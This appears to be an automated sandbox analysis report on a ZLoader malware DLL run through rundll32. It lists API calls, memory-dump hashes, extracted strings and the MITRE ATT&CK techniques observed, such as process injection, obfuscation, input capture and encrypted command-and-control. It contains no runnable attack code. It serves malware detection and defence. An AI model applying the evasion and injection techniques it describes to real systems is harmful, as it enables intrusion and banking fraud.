VirtualAlloc.KERNEL32(00000000,0002A83F,00003000,00000040), ref: 6E21462D
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E214663
VirtualProtect.KERNEL32(6E190000,00000000,00000004,6E2144B8), ref: 6E214768
VirtualProtect.KERNEL32(6E190000,00001000,00000004,6E2144B8), ref: 6E21478F
VirtualProtect.KERNEL32(00000000,?,00000002,6E2144B8), ref: 6E21485C
VirtualProtect.KERNEL32(00000000,?,00000002,6E2144B8,?), ref: 6E2148B2
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E2148CE

Memory Dump Source

Source File: 00000005.00000002.612720796.000000006E213000.00000040.00020000.sdmp, Offset: 6E213000, based on PE: false

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID:
API String ID: 2574235972-0
Opcode ID: bc1f72c7cbdfa276ad70360ba2834d3793826a7943ec06afcb4158201bc80b3a
Instruction ID: fcc3c6dc17dd9625a4015eb73d62dbfacc99566e17b1de4dbeeafe6382944527
Opcode Fuzzy Hash: bc1f72c7cbdfa276ad70360ba2834d3793826a7943ec06afcb4158201bc80b3a
Instruction Fuzzy Hash: 42D159B27003059FDF158F94C888B9177EAFFC8314B0901A4EE2DAF65AD770A991CB64

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CD9E0, Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 567COMMON

Download Yara Rule

APIs

OpenMutexA.KERNEL32(001F0001,00000000,?), ref: 6E1CDA9A

Strings

lady q, xrefs: 6E1CDA5E
D)!n, xrefs: 6E1CE0BC

Memory Dump Source

Source File: 00000005.00000002.612676348.000000006E1BB000.00000020.00020000.sdmp, Offset: 6E1BB000, based on PE: false

Similarity

API ID: MutexOpen
String ID: D)!n$lady q
API String ID: 2178833747-1405160738
Opcode ID: 49f455e54c1e3b41277febbb5a87f5ec6cb2b382401e9145c4c0f1d455c611bc
Instruction ID: 1bc4bf949b646c35aff6db1888c56c93069be65d1d764445c60b2660b67586d7
Opcode Fuzzy Hash: 49f455e54c1e3b41277febbb5a87f5ec6cb2b382401e9145c4c0f1d455c611bc
Instruction Fuzzy Hash: 0B32D272D006188FDB14CFBCC8497DDBBB2BB56304F254669E508E7680DB746A84EFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CEB80, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,0000305B,00000040,6E213F20), ref: 6E1CEC4F

Strings

@, xrefs: 6E1CEB86

Memory Dump Source

Source File: 00000005.00000002.612676348.000000006E1BB000.00000020.00020000.sdmp, Offset: 6E1BB000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID: @
API String ID: 544645111-2766056989
Opcode ID: a25c6fb6d26a8d2954ee0e4f80e1b4a328956a8a1cc0c6d384bbf94f93fc5871
Instruction ID: 6111f0856e84b3388856e41a49f7be335f8607ab7c1d29e501670aa77afd0ac7
Opcode Fuzzy Hash: a25c6fb6d26a8d2954ee0e4f80e1b4a328956a8a1cc0c6d384bbf94f93fc5871
Instruction Fuzzy Hash: 0291EAF25019088FCB08DFACC99AA9977E3FB87300B228619F61597B49CA345741FB74

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6E1C26FE, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 6E1C2797
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 6E1C27C0
GetACP.KERNEL32 ref: 6E1C27D5

Strings

OCP, xrefs: 6E1C2752
ACP, xrefs: 6E1C271C

Memory Dump Source

Source File: 00000005.00000002.612676348.000000006E1BB000.00000020.00020000.sdmp, Offset: 6E1BB000, based on PE: false

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 37cfc7ae350171c2b6d3fc3d9dba3c0bb72427fc5093bee73095ba784505c10e
Instruction ID: 6a82b90887316fca8b4cb2d7c3048d3d87564b215dc47deacd51467d488e84fd
Opcode Fuzzy Hash: 37cfc7ae350171c2b6d3fc3d9dba3c0bb72427fc5093bee73095ba784505c10e
Instruction Fuzzy Hash: 7521B636614B01EBD7548FE5C981A8773B7AB71F60B62A424E805D7104E736DDC1E362

Uniqueness

Uniqueness Score: -1.00%

Function 6E1C1F54, Relevance: 7.8, APIs: 5, Instructions: 251COMMON

Download Yara Rule

APIs

GetACP.KERNEL32 ref: 6E1C2015
IsValidCodePage.KERNEL32(00000000), ref: 6E1C2040
_wcschr.LIBVCRUNTIME ref: 6E1C20D4
_wcschr.LIBVCRUNTIME ref: 6E1C20E2
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6E1C21A3

Memory Dump Source

Source File: 00000005.00000002.612676348.000000006E1BB000.00000020.00020000.sdmp, Offset: 6E1BB000, based on PE: false

Similarity

API ID: _wcschr$CodeInfoLocalePageValid
String ID:
API String ID: 382274351-0
Opcode ID: 42df25d47f47c033bb3bbafd7abeb694d14ab5b5d3a4297fe3693fbefc0f2433
Instruction ID: 3517e4ff7be574864180a2b71de8eed2a2bdcf54e00ecd8292d948e16f9db68b
Opcode Fuzzy Hash: 42df25d47f47c033bb3bbafd7abeb694d14ab5b5d3a4297fe3693fbefc0f2433
Instruction Fuzzy Hash: AF712671640602ABE715DBB5CC44AEA73BDEF39F04F204429E509D7180EB78D9C5E662

Uniqueness

Uniqueness Score: -1.00%

Function 6E1C28D3, Relevance: 7.7, APIs: 5, Instructions: 183COMMON

Download Yara Rule

APIs

GetUserDefaultLCID.KERNEL32 ref: 6E1C29DF
IsValidCodePage.KERNEL32(00000000), ref: 6E1C2A28
IsValidLocale.KERNEL32(?,00000001), ref: 6E1C2A37
GetLocaleInfoW.KERNEL32(?,00001001,?,00000040), ref: 6E1C2A7F
GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 6E1C2A9E

Memory Dump Source

Source File: 00000005.00000002.612676348.000000006E1BB000.00000020.00020000.sdmp, Offset: 6E1BB000, based on PE: false

Similarity

API ID: Locale$InfoValid$CodeDefaultPageUser
String ID:
API String ID: 3475089800-0
Opcode ID: 7e8e1d9096f928c699c9c4cf5e63f5308a538889b9e72482f75fd2903a15d06c
Instruction ID: 6644c177a31310e35f06b32f7075e5e42f78061a9a6d98bf8d87bdb52f183715
Opcode Fuzzy Hash: 7e8e1d9096f928c699c9c4cf5e63f5308a538889b9e72482f75fd2903a15d06c
Instruction Fuzzy Hash: 55517F71900A16ABEF50CFE5CC54AAE77B8BF39B00F145829E511E7180DB789981EB62

Uniqueness

Uniqueness Score: -1.00%

Function 6E1C4891, Relevance: 7.8, APIs: 5, Instructions: 301COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.612676348.000000006E1BB000.00000020.00020000.sdmp, Offset: 6E1BB000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 311543b304ea481aa106fe1578941e9ce19631a3b08d0f42972e2328476db96e
Instruction ID: 11125ce987b73b9cd37b5304a2e7fce00f07f5c7c0eaf0aa5bacbf40afa12216
Opcode Fuzzy Hash: 311543b304ea481aa106fe1578941e9ce19631a3b08d0f42972e2328476db96e
Instruction Fuzzy Hash: F2C11374A082499FDF01CFD9C884BEEBBB5BF6A704F114058E611E7291C7789983DB62

Uniqueness

Uniqueness Score: -1.00%

Function 6E1C4010, Relevance: 6.1, APIs: 4, Instructions: 51COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?), ref: 6E1C4026
GetLastError.KERNEL32(?,?,?), ref: 6E1C4030
SetFilePointerEx.KERNEL32(?,?,?,?,?), ref: 6E1C4055
SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,?,?), ref: 6E1C407B

Memory Dump Source

Source File: 00000005.00000002.612676348.000000006E1BB000.00000020.00020000.sdmp, Offset: 6E1BB000, based on PE: false

Similarity

API ID: FilePointer$ErrorLast
String ID:
API String ID: 142388799-0
Opcode ID: ea665139204081d5e3175fa1df184e57b0d501f1a987d80634b0a3d7cb048485
Instruction ID: e1cc7fa64272970b6d9d5e4fee94cdc282946b0315b1dd0cbb6d0c853878cd28
Opcode Fuzzy Hash: ea665139204081d5e3175fa1df184e57b0d501f1a987d80634b0a3d7cb048485
Instruction Fuzzy Hash: A9016D71915518BBDF10AFE1CC489DF7F7EEF11B60F108608F425A2190D7358AA2EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1C638D, Relevance: 6.0, APIs: 4, Instructions: 32COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 6E1C63A7
GetLastError.KERNEL32 ref: 6E1C63B3

Part of subcall function 6E1C645C: CloseHandle.KERNEL32(6E2128B0,6E1C64A6,?,?,6E1C4201,?,00000001,6E1C414A,?,?,6E1C414A,?), ref: 6E1C646C

___initconout.LIBCMT ref: 6E1C63C3

Part of subcall function 6E1C641E: CreateFileW.KERNEL32(6E20ACE8,40000000,00000003,00000000,00000003,00000000,00000000,6E1C644D,6E1C41EE,?,?,6E1C414A,?), ref: 6E1C6431

WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 6E1C63D7

Memory Dump Source

Source File: 00000005.00000002.612676348.000000006E1BB000.00000020.00020000.sdmp, Offset: 6E1BB000, based on PE: false

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 6b5129dbf02877df59ec2cadea589cff12d736338dfa6d69c2a4ee061226db20
Instruction ID: 2f56668476ab47f663bb4e00d5b5af7f1095aad2277f4f36521cd334c4327eb0
Opcode Fuzzy Hash: 6b5129dbf02877df59ec2cadea589cff12d736338dfa6d69c2a4ee061226db20
Instruction Fuzzy Hash: 6CF0823A120948ABCF221BD5DC08D867FFBEFEAB11711441DF659D2520CB729892EB71

Uniqueness

Uniqueness Score: -1.00%

Function 6E1C6473, Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,6E1C414A,00000000,?,?,6E1C4201,?,00000001,6E1C414A,?,?,6E1C414A,?), ref: 6E1C648A
GetLastError.KERNEL32(?,?,6E1C4201,?,00000001,6E1C414A,?,?,6E1C414A,?), ref: 6E1C6496

Part of subcall function 6E1C645C: CloseHandle.KERNEL32(6E2128B0,6E1C64A6,?,?,6E1C4201,?,00000001,6E1C414A,?,?,6E1C414A,?), ref: 6E1C646C

___initconout.LIBCMT ref: 6E1C64A6

Part of subcall function 6E1C641E: CreateFileW.KERNEL32(6E20ACE8,40000000,00000003,00000000,00000003,00000000,00000000,6E1C644D,6E1C41EE,?,?,6E1C414A,?), ref: 6E1C6431

WriteConsoleW.KERNEL32(?,?,6E1C414A,00000000,?,?,6E1C4201,?,00000001,6E1C414A,?,?,6E1C414A,?), ref: 6E1C64BB

Memory Dump Source

Source File: 00000005.00000002.612676348.000000006E1BB000.00000020.00020000.sdmp, Offset: 6E1BB000, based on PE: false

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: a7477048ce343644ddddd2068779a7e095f66c1f345cbd9666fb55682d8e9e1b
Instruction ID: 2ee265158a8022126f1e7b074e87a4d77acb4f9b7dd45d172304b8ffd9ebdd89
Opcode Fuzzy Hash: a7477048ce343644ddddd2068779a7e095f66c1f345cbd9666fb55682d8e9e1b
Instruction Fuzzy Hash: 76F0123611051DBBCF122FD1CC08DDA3FA7FB2AB61B054014FB1895150C6368965EBA1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 6684 Parent PID: 6548 rundll32.exeCOMMON

Executed Functions

Function 6E1CD9E0, Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 567COMMON

Download Yara Rule

APIs

OpenMutexA.KERNEL32(001F0001,00000000,?), ref: 6E1CDA9A

Strings

D)!n, xrefs: 6E1CE0BC
lady q, xrefs: 6E1CDA5E

Memory Dump Source

Source File: 00000006.00000002.651022139.000000006E1BB000.00000020.00020000.sdmp, Offset: 6E1BB000, based on PE: false

Similarity

API ID: MutexOpen
String ID: D)!n$lady q
API String ID: 2178833747-1405160738
Opcode ID: 49f455e54c1e3b41277febbb5a87f5ec6cb2b382401e9145c4c0f1d455c611bc
Instruction ID: 1bc4bf949b646c35aff6db1888c56c93069be65d1d764445c60b2660b67586d7
Opcode Fuzzy Hash: 49f455e54c1e3b41277febbb5a87f5ec6cb2b382401e9145c4c0f1d455c611bc
Instruction Fuzzy Hash: 0B32D272D006188FDB14CFBCC8497DDBBB2BB56304F254669E508E7680DB746A84EFA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6E1C26FE, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 6E1C2797
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 6E1C27C0
GetACP.KERNEL32 ref: 6E1C27D5

Strings

OCP, xrefs: 6E1C2752
ACP, xrefs: 6E1C271C

Memory Dump Source

Source File: 00000006.00000002.651022139.000000006E1BB000.00000020.00020000.sdmp, Offset: 6E1BB000, based on PE: false

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 37cfc7ae350171c2b6d3fc3d9dba3c0bb72427fc5093bee73095ba784505c10e
Instruction ID: 6a82b90887316fca8b4cb2d7c3048d3d87564b215dc47deacd51467d488e84fd
Opcode Fuzzy Hash: 37cfc7ae350171c2b6d3fc3d9dba3c0bb72427fc5093bee73095ba784505c10e
Instruction Fuzzy Hash: 7521B636614B01EBD7548FE5C981A8773B7AB71F60B62A424E805D7104E736DDC1E362

Uniqueness

Uniqueness Score: -1.00%

Function 6E1C1F54, Relevance: 7.8, APIs: 5, Instructions: 251COMMON

Download Yara Rule

APIs

GetACP.KERNEL32 ref: 6E1C2015
IsValidCodePage.KERNEL32(00000000), ref: 6E1C2040
_wcschr.LIBVCRUNTIME ref: 6E1C20D4
_wcschr.LIBVCRUNTIME ref: 6E1C20E2
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6E1C21A3

Memory Dump Source

Source File: 00000006.00000002.651022139.000000006E1BB000.00000020.00020000.sdmp, Offset: 6E1BB000, based on PE: false

Similarity

API ID: _wcschr$CodeInfoLocalePageValid
String ID:
API String ID: 382274351-0
Opcode ID: 42df25d47f47c033bb3bbafd7abeb694d14ab5b5d3a4297fe3693fbefc0f2433
Instruction ID: 3517e4ff7be574864180a2b71de8eed2a2bdcf54e00ecd8292d948e16f9db68b
Opcode Fuzzy Hash: 42df25d47f47c033bb3bbafd7abeb694d14ab5b5d3a4297fe3693fbefc0f2433
Instruction Fuzzy Hash: AF712671640602ABE715DBB5CC44AEA73BDEF39F04F204429E509D7180EB78D9C5E662

Uniqueness

Uniqueness Score: -1.00%

Function 6E1C28D3, Relevance: 7.7, APIs: 5, Instructions: 183COMMON

Download Yara Rule

APIs

GetUserDefaultLCID.KERNEL32 ref: 6E1C29DF
IsValidCodePage.KERNEL32(00000000), ref: 6E1C2A28
IsValidLocale.KERNEL32(?,00000001), ref: 6E1C2A37
GetLocaleInfoW.KERNEL32(?,00001001,?,00000040), ref: 6E1C2A7F
GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 6E1C2A9E

Memory Dump Source

Source File: 00000006.00000002.651022139.000000006E1BB000.00000020.00020000.sdmp, Offset: 6E1BB000, based on PE: false

Similarity

API ID: Locale$InfoValid$CodeDefaultPageUser
String ID:
API String ID: 3475089800-0
Opcode ID: 7e8e1d9096f928c699c9c4cf5e63f5308a538889b9e72482f75fd2903a15d06c
Instruction ID: 6644c177a31310e35f06b32f7075e5e42f78061a9a6d98bf8d87bdb52f183715
Opcode Fuzzy Hash: 7e8e1d9096f928c699c9c4cf5e63f5308a538889b9e72482f75fd2903a15d06c
Instruction Fuzzy Hash: 55517F71900A16ABEF50CFE5CC54AAE77B8BF39B00F145829E511E7180DB789981EB62

Uniqueness

Uniqueness Score: -1.00%

Function 6E1C4891, Relevance: 7.8, APIs: 5, Instructions: 301COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.651022139.000000006E1BB000.00000020.00020000.sdmp, Offset: 6E1BB000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 311543b304ea481aa106fe1578941e9ce19631a3b08d0f42972e2328476db96e
Instruction ID: 11125ce987b73b9cd37b5304a2e7fce00f07f5c7c0eaf0aa5bacbf40afa12216
Opcode Fuzzy Hash: 311543b304ea481aa106fe1578941e9ce19631a3b08d0f42972e2328476db96e
Instruction Fuzzy Hash: F2C11374A082499FDF01CFD9C884BEEBBB5BF6A704F114058E611E7291C7789983DB62

Uniqueness

Uniqueness Score: -1.00%

Function 6E1C4010, Relevance: 6.1, APIs: 4, Instructions: 51COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?), ref: 6E1C4026
GetLastError.KERNEL32(?,?,?), ref: 6E1C4030
SetFilePointerEx.KERNEL32(?,?,?,?,?), ref: 6E1C4055
SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,?,?), ref: 6E1C407B

Memory Dump Source

Source File: 00000006.00000002.651022139.000000006E1BB000.00000020.00020000.sdmp, Offset: 6E1BB000, based on PE: false

Similarity

API ID: FilePointer$ErrorLast
String ID:
API String ID: 142388799-0
Opcode ID: ea665139204081d5e3175fa1df184e57b0d501f1a987d80634b0a3d7cb048485
Instruction ID: e1cc7fa64272970b6d9d5e4fee94cdc282946b0315b1dd0cbb6d0c853878cd28
Opcode Fuzzy Hash: ea665139204081d5e3175fa1df184e57b0d501f1a987d80634b0a3d7cb048485
Instruction Fuzzy Hash: A9016D71915518BBDF10AFE1CC489DF7F7EEF11B60F108608F425A2190D7358AA2EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1C638D, Relevance: 6.0, APIs: 4, Instructions: 32COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 6E1C63A7
GetLastError.KERNEL32 ref: 6E1C63B3

Part of subcall function 6E1C645C: CloseHandle.KERNEL32(6E2128B0,6E1C64A6,?,?,6E1C4201,?,00000001,6E1C414A,?,?,6E1C414A,?), ref: 6E1C646C

___initconout.LIBCMT ref: 6E1C63C3

Part of subcall function 6E1C641E: CreateFileW.KERNEL32(6E20ACE8,40000000,00000003,00000000,00000003,00000000,00000000,6E1C644D,6E1C41EE,?,?,6E1C414A,?), ref: 6E1C6431

WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 6E1C63D7

Memory Dump Source

Source File: 00000006.00000002.651022139.000000006E1BB000.00000020.00020000.sdmp, Offset: 6E1BB000, based on PE: false

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 6b5129dbf02877df59ec2cadea589cff12d736338dfa6d69c2a4ee061226db20
Instruction ID: 2f56668476ab47f663bb4e00d5b5af7f1095aad2277f4f36521cd334c4327eb0
Opcode Fuzzy Hash: 6b5129dbf02877df59ec2cadea589cff12d736338dfa6d69c2a4ee061226db20
Instruction Fuzzy Hash: 6CF0823A120948ABCF221BD5DC08D867FFBEFEAB11711441DF659D2520CB729892EB71

Uniqueness

Uniqueness Score: -1.00%

Function 6E1C6473, Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,6E1C414A,00000000,?,?,6E1C4201,?,00000001,6E1C414A,?,?,6E1C414A,?), ref: 6E1C648A
GetLastError.KERNEL32(?,?,6E1C4201,?,00000001,6E1C414A,?,?,6E1C414A,?), ref: 6E1C6496

Part of subcall function 6E1C645C: CloseHandle.KERNEL32(6E2128B0,6E1C64A6,?,?,6E1C4201,?,00000001,6E1C414A,?,?,6E1C414A,?), ref: 6E1C646C

___initconout.LIBCMT ref: 6E1C64A6

Part of subcall function 6E1C641E: CreateFileW.KERNEL32(6E20ACE8,40000000,00000003,00000000,00000003,00000000,00000000,6E1C644D,6E1C41EE,?,?,6E1C414A,?), ref: 6E1C6431

WriteConsoleW.KERNEL32(?,?,6E1C414A,00000000,?,?,6E1C4201,?,00000001,6E1C414A,?,?,6E1C414A,?), ref: 6E1C64BB

Memory Dump Source

Source File: 00000006.00000002.651022139.000000006E1BB000.00000020.00020000.sdmp, Offset: 6E1BB000, based on PE: false

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: a7477048ce343644ddddd2068779a7e095f66c1f345cbd9666fb55682d8e9e1b
Instruction ID: 2ee265158a8022126f1e7b074e87a4d77acb4f9b7dd45d172304b8ffd9ebdd89
Opcode Fuzzy Hash: a7477048ce343644ddddd2068779a7e095f66c1f345cbd9666fb55682d8e9e1b
Instruction Fuzzy Hash: 76F0123611051DBBCF122FD1CC08DDA3FA7FB2AB61B054014FB1895150C6368965EBA1

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report LbSpXJz6Ey.dll

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: ZLoader

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Exports

Version Infos

Possible Origin

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

Function 6E19A596, Relevance: 12.1, APIs: 8, Instructions: 136
COMMON

Function 6E19A646, Relevance: 7.6, APIs: 5, Instructions: 87
COMMON

Function 6E19A48F, Relevance: 4.6, APIs: 3, Instructions: 76
COMMON

Function 6E19DBDC, Relevance: 64.1, APIs: 32, Strings: 4, Instructions: 1115
COMMONCrypto

Function 6E1AD780, Relevance: 4.6, APIs: 3, Instructions: 77
COMMON

Function 6E1ADFA0, Relevance: 4.5, APIs: 3, Instructions: 20
COMMON

Function 6E19ACA6, Relevance: 1.6, APIs: 1, Instructions: 144
COMMON

Function 6E1B1154, Relevance: 1.5, APIs: 1, Instructions: 33
COMMON

Function 6E1B1254, Relevance: 1.5, APIs: 1, Instructions: 14
COMMON

Function 6E1AA57C, Relevance: 1.5, Strings: 1, Instructions: 243
COMMONCrypto

Function 6E1AAA55, Relevance: 1.5, Strings: 1, Instructions: 243
COMMONCrypto

Function 6E1AA7F0, Relevance: 1.5, Strings: 1, Instructions: 239
COMMONCrypto

Function 6E1AA317, Relevance: 1.5, Strings: 1, Instructions: 239
COMMONCrypto

Function 6E1A9C63, Relevance: 1.5, Strings: 1, Instructions: 220
COMMONCrypto

Function 6E1AA0D6, Relevance: 1.5, Strings: 1, Instructions: 220
COMMONCrypto

Function 6E1A9EA4, Relevance: 1.5, Strings: 1, Instructions: 216
COMMONCrypto

Function 6E1A9A31, Relevance: 1.5, Strings: 1, Instructions: 216
COMMONCrypto

Function 6E1C7291, Relevance: .1, Instructions: 104
COMMONCrypto

Function 6E1C7171, Relevance: .1, Instructions: 81
COMMONCrypto

Function 6E1B726E, Relevance: .0, Instructions: 22
COMMON

Function 6E1A0748, Relevance: 37.1, APIs: 19, Strings: 2, Instructions: 339
COMMON

Function 6E1A1A13, Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 301
COMMON

Function 6E1BC7CF, Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 113
COMMON

Function 6E19EF3E, Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 338
COMMON

Function 6E19C29B, Relevance: 19.6, APIs: 7, Strings: 4, Instructions: 308
COMMON

Function 6E1A315F, Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 180
COMMON

